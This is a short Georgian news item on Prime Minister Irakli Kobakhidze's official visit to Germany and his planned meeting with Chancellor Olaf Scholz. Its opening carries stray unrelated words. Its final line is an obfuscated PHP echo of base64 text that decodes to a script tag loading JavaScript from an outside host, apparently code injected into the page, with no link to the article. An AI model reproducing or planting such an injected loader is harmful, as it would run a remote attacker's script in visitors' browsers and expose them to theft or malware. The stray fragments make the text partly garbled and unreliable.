celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერ-მინისტრი ირაკლი კობახიძე გერმანიის ფედერალურ კანცლერს, ოლაფ შოლცს დღეს შეხვდება.

ოლაფ შოლცი ირაკლი კობახიძეს გერმანიის ფედერალურ კანცელარიაში უმასპინძლებს, სადაც დახვედრის ოფიციალური ცერემონია გაიმართება.

დაგეგმილია შეხვედრები პირისპირ და გაფართოებულ ფორმატში, რის შემდეგაც ირაკლი კობახიძე და ოლაფ შოლცი ერთობლივ პრესკონფერენციას გამართავენ.

საქართველოს პრემიერ-მინისტრი ოფიციალური ვიზიტით გერმანიის ფედერაციულ რესპუბლიკაში გუშინ გაემგზავრა.

ოფიციალური ვიზიტის ფარგლებში საქართველოს მთავრობის მეთაური შეხვდება გერმანიის ფედერაციული რესპუბლიკის პრეზიდენტს, ფრანკ-ვალტერ შტაინმაიერს და გერმანიის ბუნდესტაგის პრეზიდენტს, ბერბელ ბასს.

საქართველოს დელეგაციაში, რომელსაც პრემიერ-მინისტრი ირაკლი კობახიძე ხელმძღვანელობს, ვიცე-პრემიერი, თავდაცვის მინისტრი ირაკლი ჩიქოვანი, საგარეო საქმეთა მინისტრი ილია დარჩიაშვილი და მთავრობის ადმინისტრაციის უფროსი ლევან ჟორჟოლიანი არიან.

223
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");